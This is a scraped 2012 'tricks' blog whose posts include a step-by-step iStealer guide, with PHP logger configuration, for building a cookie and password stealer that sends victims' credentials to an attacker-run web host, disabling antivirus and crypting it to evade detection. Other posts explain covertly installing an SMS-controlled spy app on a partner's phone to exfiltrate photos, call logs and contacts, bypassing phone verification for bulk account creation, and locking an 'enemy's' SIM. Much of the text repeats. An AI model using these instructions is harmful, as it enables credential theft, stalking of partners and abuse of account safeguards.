COMPRESS 1 GB OF DATA INTO 10 MB USING KGB ARCHIVER
Posted by Kunal Karda 9/07/2012
COMPRESS 1GB INTO 10MB
KGB Archiver is the compression tool with unbelievable high compression rate. It surpasses even such efficient compression tool like 7zip and UHARC in terms of the abilities.
Unfortunately although its powerful compression rate, it has high hardware requirements (I recommend
processor with 1,5GHz clock and 256MB of RAM as an essential minimum).
One of the advantages of KGB Archiver is also AES-256 encryption which is used to encrypt the archives.
This is one of the strongest encryptions known for human.You need this archiever to extract the files. The extraction time depends entirely on your hardware and setting of priority for extraction . Average time extracting the files on a p4 3.2 ghz system with 1 gig of ram is about 2.47 hrs ( Priority =Above normal)
KGB Archiver is the compression tool with unbelievable high compression rate. It surpasses even such efficient compression tool like 7zip and UHARC in terms of the abilities.
Unfortunately although its powerful compression rate, it has high hardware requirements (I recommend
processor with 1,5GHz clock and 256MB of RAM as an essential minimum).
One of the advantages of KGB Archiver is also AES-256 encryption which is used to encrypt the archives.
This is one of the strongest encryptions known for human.You need this archiever to extract the files. The extraction time depends entirely on your hardware and setting of priority for extraction . Average time extracting the files on a p4 3.2 ghz system with 1 gig of ram is about 2.47 hrs ( Priority =Above normal)
Download [link updated]
BYPASS ANY SMS VERIFICATION
Posted by Nikhil Chawra 9/04/2012
There are various website like google, youtube etc that ask for sms verification before registration. Verification Bypass means creating gmail account without SMS verification code that is generated by Google Systems to enforce users to enter their mobile numbers and receive the verification code. As users receive Google verification code, they have to enter it on the submission forms and that is the only way to create gmail account. Unfortunately, your mobile number is only valid for only a few of Gmail accounts. So when you try to put same mobile number more than allowed number of times, Google System restricts you and you cant create more gmail accounts.
we present you a simple trick to bypass it —
I Hope u will enjoy this Tutorial !
1. Visit http://receive-sms-online.com/
2. copy one of the two number written below and put in the fields where they are asking for sms registration
3. then simple go back to http://receive-sms-online.com/ and click the number u have selected there u will find your code sent by google, youtube or other websites.
How To Spy Your Girlfriend Mobile Phone With A Free Software Remotly
Posted by Nikhil Chawra 9/04/2012
Today i am Writing a very interesting post for You friends..What is The cost to hire a spy who can able to spy your girlfriend 24X7 days..???? its around hundreds of dollars Or may Be Thousands of dollars but you are on infotechno, so everything here mentioned are free..would you be happy if i will show you a trick by which you can track your girlfriend,spouse or anyone's mobile phone 24 X 7 which is absolutely free..The only thing you have to do is send a sms like SENDCALLLOG To get the call history of your girlfriend's phone.
SO lets Start The trick...
1 First of all go to android market from your Girlfriend,spouse,friends or anyone's phone which you want to spy.
2 Search for a android application named "Touch My life.."
3 Download and install that application on that phone.
4 Trick is Over :)
Now you can able to spy that phone anytime by just sending sms to that phone. Now give back that phone to your girlfriend and whenever you want to spy your girlfriend just send sms from your phone to your Girlfriend phone Which are mentioned in Touch My Life manage book.
i am mentioning some handy rules below...
1) Write "CALLMEBACK" without Quotes and Send it to your girlfriend's mobile number for a Automatic call back from your girlfriend's phone to your phone.
2)Write "VIBRATENSEC 30" without Quotes and send it to your girlfriend's mobile number to Vibrate your Girlfriend's Phone for 30 seconds..You can also change Values from 30 to anything for the desired Vibrate time.
3)Write "DEFRINGTONE" without Quotes and Send it to your girlfriend's mobile number..this will play the default ringtone on your girlfriend's phone.
4)Write "SENDPHOTO youremail@gmail.com" without Quotes and Send it to your girlfriend's mobile number.it will take the photo of current location of your girlfriend and send it to the email address specified in the SMS as a attachment.it will also send a confirmation message to your number.
5)Write "SENDCALLLOG youremail@gmail.com" without Quotes and Send it to your girlfriend's mobile number ..it will send all the call details like incoming calls,outgoing calls,missed calls to the email address specified in the SMS.
6)Write "SENDCONTACTLIST youremail@gmail.com" without Quotes and Send it to your girlfriend's mobile number ..it will send all the Contact list to the email address specified in the SMS.
So Guys Above all are only some Handy features of touch my life...You can also view more by going to touch my life application and then its manage rules.. :)
Enjoy..:)
Trick to make Unlimited free Calls From Internet to mobile Phone
Posted by Nikhil Chawra 9/04/2012
Now a day’s VoIP (Voice Over Internet protocol) is going to change our internet
experience by providing free calling facility all over the world by just using
internet..
We all love to make free calls from internet..:)
There are lots of websites and web-clients offering internet to internet calling facility..Gtalk is One of them...
But what if I tell you the trick by which you can make calls from free internet to mobile phones..?
Isn’t it Sound Cool..?
Hmm..To Make Free Calls From your pc To Mobile Phones All You need is a MIC or Headphone and Yahoo Messenger...
STEP 1: Install Yahoo Messenger..if You don’t have Yahoo Messenger On Your Pc Then Follow This Download Link And Download The Latest Version.
STEP 2: Sign In to Your Yahoo Messenger By Using Your Yahoo Id And Password.
STEP 3: Configure Your MIC or Headphone In Yahoo Messenger..
STEP 4: Inside Your Yahoo Messenger dial +18003733411 ..As You Can See In Image Below..
STEP 5: After That An operator greets you with a recorded welcome message along with an advertisement and asks you to select one of the Free411 service. Just hear the services options until they say the last one as “Free Call”. When you hear this, don’t press any number on your keyboard and instead SAY “Free call” loudly on your microphone connected to your PC.
After this voice message is detected by their System, they will run a short advertisement of their sponsor Don’t Press Any Number At That Time..
WAIT UNTIL YOU HEAR A BEEP SOUND after the following message “Please dial the phone number with country code first (i.e “1 for north America Or 91 For India”)
Now Your Call Will Be Connected And You Can Call 7 Continuous minutes For Free..
After Disconnected…Repeat The Same Procedure Again..You Can Able To make Multiple and Unlimited Calls By Using This Trick...you Can Also make International Calls By Using This Trick..
For More Tricks Like This..Stay Tuned With Us.. :))
Enjoy.!!!
We all love to make free calls from internet..:)
There are lots of websites and web-clients offering internet to internet calling facility..Gtalk is One of them...
But what if I tell you the trick by which you can make calls from free internet to mobile phones..?
Isn’t it Sound Cool..?
Hmm..To Make Free Calls From your pc To Mobile Phones All You need is a MIC or Headphone and Yahoo Messenger...
STEP 1: Install Yahoo Messenger..if You don’t have Yahoo Messenger On Your Pc Then Follow This Download Link And Download The Latest Version.
STEP 2: Sign In to Your Yahoo Messenger By Using Your Yahoo Id And Password.
STEP 3: Configure Your MIC or Headphone In Yahoo Messenger..
STEP 4: Inside Your Yahoo Messenger dial +18003733411 ..As You Can See In Image Below..
Now A Small window Will Pop-up…
STEP 5: After That An operator greets you with a recorded welcome message along with an advertisement and asks you to select one of the Free411 service. Just hear the services options until they say the last one as “Free Call”. When you hear this, don’t press any number on your keyboard and instead SAY “Free call” loudly on your microphone connected to your PC.
After this voice message is detected by their System, they will run a short advertisement of their sponsor Don’t Press Any Number At That Time..
WAIT UNTIL YOU HEAR A BEEP SOUND after the following message “Please dial the phone number with country code first (i.e “1 for north America Or 91 For India”)
Now Your Call Will Be Connected And You Can Call 7 Continuous minutes For Free..
After Disconnected…Repeat The Same Procedure Again..You Can Able To make Multiple and Unlimited Calls By Using This Trick...you Can Also make International Calls By Using This Trick..
For More Tricks Like This..Stay Tuned With Us.. :))
Enjoy.!!!
Hack Passwords Using iStealer
Posted by Nikhil Chawra 9/03/2012
There are different way's to steal passwords.
I want to be able to steal passwords from cookie files with 1 click,
well what do you know it exists! It's a cookie stealer called iStealer ( 6.0 is newest version ).
It steals every cookie password from the slave's browser, and shows it to the attacker.
So if you do it correctly you will have hotmail, netlog, facebook, WoW, rapidshare and other passwords from lots of people in no time.
I'll set one up, and will go thru all the details.
Prepare yourself
1st Download iStealer 6.0 ( link is at the bottom of the thread )
2th Disable your virusscanner, this is because your antivirus sees the iStealer program as a keylogger ( it's acctualy a CookieStealer but whatever )
3th Register domain and hosting
iStealer requires a webserver, this is because when someone click's your own made "Virus" it has to send the passwords and usernames somewhere.
I suggest http://www.000webhost.com/ for free webhosting, so register a domain there.
The registration can take a while, but when u have your domain registered, go to the cPanel.
Once your on the cPanel, click on MySQL ( this is under the tab "Software / Services" )
Now create a new database and user. Something like this
MySQL database name: a7356028_stealer
MySQL user name: a7356028_theadmin
Password for MySQL user: 123456
Then click create database.
Configure to steal
Now extract the downloaded zip file ( below the thread ).
You should have iStealer 6.0.exe, and a map called PHP Logger.
Open index.php in the map PHP Logger with notepad or any text-editor.
you see a bunch of codes, but dont worry, we only need the first part of the php file. Search for the CONFIGURATION section, this will be in it
$dbHost = "localhost"; // MySQL host
$dbUser = "suicide_admin"; // MySQL username
$dbPass = "GOX"; // MySQL password
$dbDatabase = "suicide_is"; // MySQL database name
$username = "admin"; // Login Username
$password = "GOV"; // Login Password
$logspage = 100; // Number of logs per page
Configure this with you own MySQL database information. Then it should look like this
$dbHost = "localhost"; // MySQL host
$dbUser = "a7356028_theadmin"; // MySQL username
$dbPass = "123456"; // MySQL password
$dbDatabase = "a7356028_stealer"; // MySQL database name
$username = "admin"; // Login Username
$password = "whatuwant"; // Login Password
$logspage = 100; // Number of logs per page
Note that the $username and $password variable will be used to log in your website, so choose it carefully.
Now save the file.
Loading it up
Go back to the cPanel of your site, and click on File Manager ( under the tab "Files )
Log in with your 000webhost password and continue.
Click on public_html map, and once ur in it, click Upload.
Select the index.php you saved before, and the style.css
Upload it.
Then just browse to your domain name in your browser, and login with the $username and $password you choose in the index.php ( in my case admin and whatuwant ). Now you have the page where the passwords and usernames are stored.
Making the Stealer File!
Now everything is set up, we have to make our CookieStealer file.
Just open iStealer 6.0.exe, enter your domain on the top ( edit things you want, like changing the icon etc ).
Click build!
Testing, crypting, spreading?
Testing?
To see if it works, just click it yourself! If you enter your website, and see your passwords and usernames, it works!
Crypting?
Well, it worked on yourself, because your antivirus is not up, but most of the people have antivirus scanner on all the time, so you might think of crypting it ( making it undetectable ), i'll talk about this later ( and show u some tools ), in the main time, use Google!
I want to be able to steal passwords from cookie files with 1 click,
well what do you know it exists! It's a cookie stealer called iStealer ( 6.0 is newest version ).
It steals every cookie password from the slave's browser, and shows it to the attacker.
So if you do it correctly you will have hotmail, netlog, facebook, WoW, rapidshare and other passwords from lots of people in no time.
I'll set one up, and will go thru all the details.
Prepare yourself
1st Download iStealer 6.0 ( link is at the bottom of the thread )
2th Disable your virusscanner, this is because your antivirus sees the iStealer program as a keylogger ( it's acctualy a CookieStealer but whatever )
3th Register domain and hosting
iStealer requires a webserver, this is because when someone click's your own made "Virus" it has to send the passwords and usernames somewhere.
I suggest http://www.000webhost.com/ for free webhosting, so register a domain there.
The registration can take a while, but when u have your domain registered, go to the cPanel.
Once your on the cPanel, click on MySQL ( this is under the tab "Software / Services" )
Now create a new database and user. Something like this
MySQL database name: a7356028_stealer
MySQL user name: a7356028_theadmin
Password for MySQL user: 123456
Then click create database.
Configure to steal
Now extract the downloaded zip file ( below the thread ).
You should have iStealer 6.0.exe, and a map called PHP Logger.
Open index.php in the map PHP Logger with notepad or any text-editor.
you see a bunch of codes, but dont worry, we only need the first part of the php file. Search for the CONFIGURATION section, this will be in it
$dbHost = "localhost"; // MySQL host
$dbUser = "suicide_admin"; // MySQL username
$dbPass = "GOX"; // MySQL password
$dbDatabase = "suicide_is"; // MySQL database name
$username = "admin"; // Login Username
$password = "GOV"; // Login Password
$logspage = 100; // Number of logs per page
Configure this with you own MySQL database information. Then it should look like this
$dbHost = "localhost"; // MySQL host
$dbUser = "a7356028_theadmin"; // MySQL username
$dbPass = "123456"; // MySQL password
$dbDatabase = "a7356028_stealer"; // MySQL database name
$username = "admin"; // Login Username
$password = "whatuwant"; // Login Password
$logspage = 100; // Number of logs per page
Note that the $username and $password variable will be used to log in your website, so choose it carefully.
Now save the file.
Loading it up
Go back to the cPanel of your site, and click on File Manager ( under the tab "Files )
Log in with your 000webhost password and continue.
Click on public_html map, and once ur in it, click Upload.
Select the index.php you saved before, and the style.css
Upload it.
Then just browse to your domain name in your browser, and login with the $username and $password you choose in the index.php ( in my case admin and whatuwant ). Now you have the page where the passwords and usernames are stored.
Making the Stealer File!
Now everything is set up, we have to make our CookieStealer file.
Just open iStealer 6.0.exe, enter your domain on the top ( edit things you want, like changing the icon etc ).
Click build!
Testing, crypting, spreading?
Testing?
To see if it works, just click it yourself! If you enter your website, and see your passwords and usernames, it works!
Crypting?
Well, it worked on yourself, because your antivirus is not up, but most of the people have antivirus scanner on all the time, so you might think of crypting it ( making it undetectable ), i'll talk about this later ( and show u some tools ), in the main time, use Google!
Metasploit: A Penetration Tester's Guide free download
Posted by Nikhil Chawra 9/03/2012
"The Metasploit Framework makes discovering, exploiting, and sharing vulnerabilities quick and relatively painless. But while Metasploit is used by security professionals everywhere, documentation is lacking and the tool can be hard to grasp for first-time users. Metasploit: A Penetration Tester's Guide fills this gap by teaching you how to harness the Framework, use its many features, and interact with the vibrant community of Metasploit contributors. The authors begin by building a foundation for penetration testing and establishing a fundamental methodology. From there, they explain the Framework's conventions, interfaces, and module system, as they show you how to assess networks with Metasploit by launching simulated attacks.
Download
Having mastered the essentials, you'll move on to advanced penetration testing techniques, including network reconnaissance and enumeration, client-side attacks, devastating wireless attacks, and targeted social engineering attacks. Metasploit: A Penetration Tester's Guide willteach you how to: Find and exploit unmaintained, misconfigured, and unpatched systems Perform reconnaissance and find valuable information about your target Bypass anti-virus technologies and circumvent security controls Integrate Nmap, NeXpose, and Nessus with Metasploit to automate discovery Use the Meterpreter shell to launch further attacks from inside the network Harness standalone Metasploit utilities, third-party tools, and plug-ins Learn how to write your own Meterpreter post exploitation modules and scripts You'll even touch on exploit discovery for zero-day research, write a fuzzer, port existing exploits into the Framework, and learn how to cover your tracks. Whether your goal is to make your own networks more secure or to put someone else's to the test, Metasploit: A Penetration Tester's Guide will take you there and beyond"--
Download
Having mastered the essentials, you'll move on to advanced penetration testing techniques, including network reconnaissance and enumeration, client-side attacks, devastating wireless attacks, and targeted social engineering attacks. Metasploit: A Penetration Tester's Guide willteach you how to: Find and exploit unmaintained, misconfigured, and unpatched systems Perform reconnaissance and find valuable information about your target Bypass anti-virus technologies and circumvent security controls Integrate Nmap, NeXpose, and Nessus with Metasploit to automate discovery Use the Meterpreter shell to launch further attacks from inside the network Harness standalone Metasploit utilities, third-party tools, and plug-ins Learn how to write your own Meterpreter post exploitation modules and scripts You'll even touch on exploit discovery for zero-day research, write a fuzzer, port existing exploits into the Framework, and learn how to cover your tracks. Whether your goal is to make your own networks more secure or to put someone else's to the test, Metasploit: A Penetration Tester's Guide will take you there and beyond"--
Batch File Programming book for beginners written by Premkumar .S
Posted by Nikhil Chawra 9/03/2012
Batch File Programming book for beginners
This book "Batch File Programming" is written after experimenting and testing all the snippets covered in this book. Batch File Programming is a pretty old one, but i have found lot of books that have not covered the dark side of the batch which still remains untold the ultimate goal of this book is to make the readers understand how it works what are the limitations of the batch what else is possible with a batch construction useful programs with various views creating a batch virus by misusing the commands creating a batch file to an executable and lot more.
Index
- Batch File programming
- Internal and external commands
- Run line commands
- Batch operator
- Basic commands
- Environment variable
- Lopping statement
- Conditional statement
- Commands associated with files and folder
- Network troubleshooting comands
- Code snippets
- Virus programming
- Converting batch to executable
SAMSUNG MOBILE T200 CODES
Posted by Nikhil Chawra 9/03/2012
Samsung codes
*#06# IMEI code
*#9998*4357# Help Menu
*#9998*5282# Java menu (GRPS/CSD settings for JAVA server)
*#9999#0# Monitor
Mode
*#9999# or *#9998*9999# Software Version
*#8888# or *#9998*8888# Hardware Version
*#9998*746# or *#9998*0746# or *#0746# Sim Infos
*#9998*523# or *#9998*0523# or *#0523# Display Contrast
*#9998*842# or *#9998*0842# or *#0842# Vibration On
*#9998*289# or *#9998*0289# or *#0289# Buzzer On
*#9998*288# or *#9998*0288# or *#0288# Battery & Field Infos
*#9998*377# or *#9998*0377# Error log
*#9998*778# or *#9998*0778# or *#0778# Sim Service table
*#9998*782# show date and alarm clock
*#8999*638# show network information
*#9998*5646# change operator logo at startup
*#9998*76# production number
*#9998*968# view melody for alarm
*#9998*585# Non-Volatile Memory (NVM)
*#3243948# Digital Audio Interference Off
*#32436837# Digital Audio Interference On
*#9998*4357# Help Menu
*#9998*5282# Java menu (GRPS/CSD settings for JAVA server)
*#9999#0# Monitor
Mode
*#9999# or *#9998*9999# Software Version
*#8888# or *#9998*8888# Hardware Version
*#9998*746# or *#9998*0746# or *#0746# Sim Infos
*#9998*523# or *#9998*0523# or *#0523# Display Contrast
*#9998*842# or *#9998*0842# or *#0842# Vibration On
*#9998*289# or *#9998*0289# or *#0289# Buzzer On
*#9998*288# or *#9998*0288# or *#0288# Battery & Field Infos
*#9998*377# or *#9998*0377# Error log
*#9998*778# or *#9998*0778# or *#0778# Sim Service table
*#9998*782# show date and alarm clock
*#8999*638# show network information
*#9998*5646# change operator logo at startup
*#9998*76# production number
*#9998*968# view melody for alarm
*#9998*585# Non-Volatile Memory (NVM)
*#3243948# Digital Audio Interference Off
*#32436837# Digital Audio Interference On
Samsung T100 secret codes
*#06# IMEI code
*#9999# -> Show Software Version
*#0001# -> Show Serial Parameters
*2767*3855# -> Full EEPROM Reset ( THIS CODE REMOVES SP-LOCK!!!! but also change IMEI to 447967-89-400044-0, you must use CHGIMEI to restore it)
*2767*2878# -> Custom EEEPROM Reset
*#8999*228# -> Battery status (capacity, voltage, temperature)
*#8999*246# -> Program status
*#8999*289# -> Change Alarm Buzzer Frequency
*#8999*324# -> Debug screens
*#8999*364# -> Watchdog
*#8999*377# -> EEPROM Error Stack
*#8999*427# -> Trace Watchdog
*#8999*523# -> Change LCD contrast
*#8999*544# -> Jig detect
*#8999*636# -> Memory status
*#8999*746# -> SIM File Size
*#8999*778# -> SIM Service Table
*#8999*785# -> RTK (Run Time Kernel) errors
*#8999*786# -> Run, Last UP, Last DOWN
*#8999*837# -> Software Version
*#8999*842# -> Test Vibrator
*#8999*862# -> Vocoder Reg
*#8999*872# -> Diag
*#8999*947# -> Reset On Fatal Error
*#8999*999# -> Last/Chk
*#8999*9266# -> Yann debug screen (=Debug Screens?)
*#8999*9999# -> Software version
*#9999# -> Show Software Version
*#0001# -> Show Serial Parameters
*2767*3855# -> Full EEPROM Reset ( THIS CODE REMOVES SP-LOCK!!!! but also change IMEI to 447967-89-400044-0, you must use CHGIMEI to restore it)
*2767*2878# -> Custom EEEPROM Reset
*#8999*228# -> Battery status (capacity, voltage, temperature)
*#8999*246# -> Program status
*#8999*289# -> Change Alarm Buzzer Frequency
*#8999*324# -> Debug screens
Infotechno |
*#8999*377# -> EEPROM Error Stack
*#8999*427# -> Trace Watchdog
*#8999*523# -> Change LCD contrast
*#8999*544# -> Jig detect
*#8999*636# -> Memory status
*#8999*746# -> SIM File Size
*#8999*778# -> SIM Service Table
*#8999*785# -> RTK (Run Time Kernel) errors
*#8999*786# -> Run, Last UP, Last DOWN
*#8999*837# -> Software Version
*#8999*842# -> Test Vibrator
*#8999*862# -> Vocoder Reg
*#8999*872# -> Diag
*#8999*947# -> Reset On Fatal Error
*#8999*999# -> Last/Chk
*#8999*9266# -> Yann debug screen (=Debug Screens?)
*#8999*9999# -> Software version
Samsung T200 codes
#9324# Netmon (press the hangup key to exit)
#9998*JAVA# Edit GPRS/ CSD settings (S100 Only)
*#9998*Help# Help screen/ List of codes
*#9998*LOGO# Change operator Logo
*#9998*RTC# RTC Display
*#9998*Bat# Battery Status
*#9998*Buz# Turns Buzzer ON
*#9998*Vib# Turns Vibrator ON
*#9998*LCD# LCD Contrast
*#9998*9999# Softwre Version
*#9998*8888# Hardware Version
*#9998*377# NVM Error Log (?????)
*#9998*NET# SIM Network ID
Infotechno |
*#9998*SIM# SIM Info
*#9998*PN# Production No.
*#9998*968# Reminder Tune
*#9998*NVM# Displays Non-Volitile Memory Status
*#9999*C# ???????????????????
*#06# Displays phones I**I No.
***/// ***/// NOTE /// *** RED COLOR , they appear serious !!! Use at own risk !!!
*#9998*2576# Forces SIM Error
*#9998*DEAD# Forces Phone Crash
*2767*MEDIA# Resets the medis on the phone (deletes all downloaded pics/tones)
*2767*FULL# Resets the EEPRON *DANGEROUS*
*2767*CUST# Resets the Custom EEPRON
*2767*JAVA# Resets JAV downloads (deletes all downloaded midlits)
*2767*STACKRESET# Resets Stack
*2767*225RESET# ????????????????? * Dangerous *
*2767*WAP# Resets WAP Setting & Deletes Favorites
For all Samsung mobiles ! some codes are not applicable for all samsung mobile
ENJOY..............................................
How to Bypass Google 2 Step Verification
Posted by Nikhil Chawra 9/03/2012
Step 1. First
of all go to www.k7.net and sign up there. This is a site where you
can receive fax or voice calls without having a phone no. When you
create an account on this site, it will provide you an unique phone no.
of US.
Related Post - BYPASS ANY SMS VERIFICATION
Step 2. Now go for creating account on gmail, enter all the information as you want, but in Location fill 'United States'.
Step 3. Now click on 'I accept, create an account'.
Step 4. Now it will take you to mobile verification page. Here select the option of Voice call and fill the no. that you got from http://www.k7.net/
Step 5. Now you will get a mail having verification code as voice mail on that account from which you have registered on . Open it, download the attachment file and listen the code http://www.k7.net/
Step 6. Now enter the code of your voice mail in verification code. and click OK.Your account is ready now :)
Related Post - BYPASS ANY SMS VERIFICATION
Step 2. Now go for creating account on gmail, enter all the information as you want, but in Location fill 'United States'.
Step 3. Now click on 'I accept, create an account'.
Step 4. Now it will take you to mobile verification page. Here select the option of Voice call and fill the no. that you got from http://www.k7.net/
Step 5. Now you will get a mail having verification code as voice mail on that account from which you have registered on . Open it, download the attachment file and listen the code http://www.k7.net/
Step 6. Now enter the code of your voice mail in verification code. and click OK.Your account is ready now :)
HOW TO BLOCK YOUR ENEMY'S SIM CARD
Posted by Nikhil Chawra 9/03/2012
What is Sim card ?
A subscriber identity module or subscriber identification module (SIM) is an integrated circuit that securely stores the International Mobile Subscriber Identity (IMSI) and the relatedkey used to identify and authenticate subscribers on mobile telephony devices (such as mobile phones and computers).
- BY wikipedia
HOW TO BLOCK YOUR ENEMY'S SIM CARD
Here a simple trick for block your enemy sim card,Blocking a sim card is too simple.What you have to do is just enter the below code in the desired phone
**04*3814*7529*68243#
Entering of above code will ask you to enter the PUK code.To solve this issue just call customer care and get your PUK code.
Note:Entering of invalid PUK will cause permanent blocking of your SIM
A subscriber identity module or subscriber identification module (SIM) is an integrated circuit that securely stores the International Mobile Subscriber Identity (IMSI) and the relatedkey used to identify and authenticate subscribers on mobile telephony devices (such as mobile phones and computers).
- BY wikipedia
HOW TO BLOCK YOUR ENEMY'S SIM CARD
Here a simple trick for block your enemy sim card,Blocking a sim card is too simple.What you have to do is just enter the below code in the desired phone
**04*3814*7529*68243#
Entering of above code will ask you to enter the PUK code.To solve this issue just call customer care and get your PUK code.
Note:Entering of invalid PUK will cause permanent blocking of your SIM
YOUR OWN PORTABLE HACKING DEVICE
Posted by Kunal Karda 9/03/2012
MAKE IPOD/IPHONE A HACKING DEVICE
For all the complaints against apple for making it hard to get an
application registered and sold in the Apple store, there are some very
cool applications that can be used to set up your Iphone or other apple
Iphone OS based system into an excellent scanning and pseudo hacker
tool. These are the products you want to get if you are a security
engineer.
Ipad that will help you figure out what systems have what ports open on
a remote computer. Cost is 1.99 and it works quite well, but at times a
bit slow depending on the network you are working with. This is the
coolest tool out there right now to use an IPod/Ipad/Iphone for
security work.
address and number of services running on each computer that it
encounters. Works excellent on an Iphone/IPod meaning it will work
great on an Ipad as well.
on all the Iphone/Ipod systems that I tested this on and allowed remote
access. Saving off the data from the security scanner you can use this
tool for checking Windows based systems that might be improperly
secured.
most expensive application of the lot. Works very well and if the VNC
server is not set up right can help you figure out how to connect to
systems that are improperly configured or are not using a good password
system.
around you and which ones are secure and which ones are not. Very
similar to any other wireless network analyzer on the market, this one
works on your IPod/Iphone and should work great on an Ipad.
With these tools you can turn your Iphone/IPod and soon to be Ipad
into a relatively robust and portable security/hacker system that will
let you know a lot about the networks you are connecting too. These are
some very cool applications and for around 40 dollars in total these
can be yours and working very quickly on your IPod/Iphone.
For all the complaints against apple for making it hard to get an
application registered and sold in the Apple store, there are some very
cool applications that can be used to set up your Iphone or other apple
Iphone OS based system into an excellent scanning and pseudo hacker
tool. These are the products you want to get if you are a security
engineer.
Security Scanner by Tommy Kammerer
A full featured port scanner for your Iphone, IPod or soon to beIpad that will help you figure out what systems have what ports open on
a remote computer. Cost is 1.99 and it works quite well, but at times a
bit slow depending on the network you are working with. This is the
coolest tool out there right now to use an IPod/Ipad/Iphone for
security work.
iNet Pro Network Scanner
This one is more detailed in terms of providing the name, IPaddress and number of services running on each computer that it
encounters. Works excellent on an Iphone/IPod meaning it will work
great on an Ipad as well.
iTap RDP Client for Windows by HLW
This application completely rocks and is very easy to use. It workson all the Iphone/Ipod systems that I tested this on and allowed remote
access. Saving off the data from the security scanner you can use this
tool for checking Windows based systems that might be improperly
secured.
iTap VNC Client
Same as the iTap RDP Client – just works on VNC systems and is themost expensive application of the lot. Works very well and if the VNC
server is not set up right can help you figure out how to connect to
systems that are improperly configured or are not using a good password
system.
WiFi Analyzer
A very simple WiFi analyzer to let you know what networks arearound you and which ones are secure and which ones are not. Very
similar to any other wireless network analyzer on the market, this one
works on your IPod/Iphone and should work great on an Ipad.
With these tools you can turn your Iphone/IPod and soon to be Ipad
into a relatively robust and portable security/hacker system that will
let you know a lot about the networks you are connecting too. These are
some very cool applications and for around 40 dollars in total these
can be yours and working very quickly on your IPod/Iphone.
?
+
X
Recommended for you
Loading..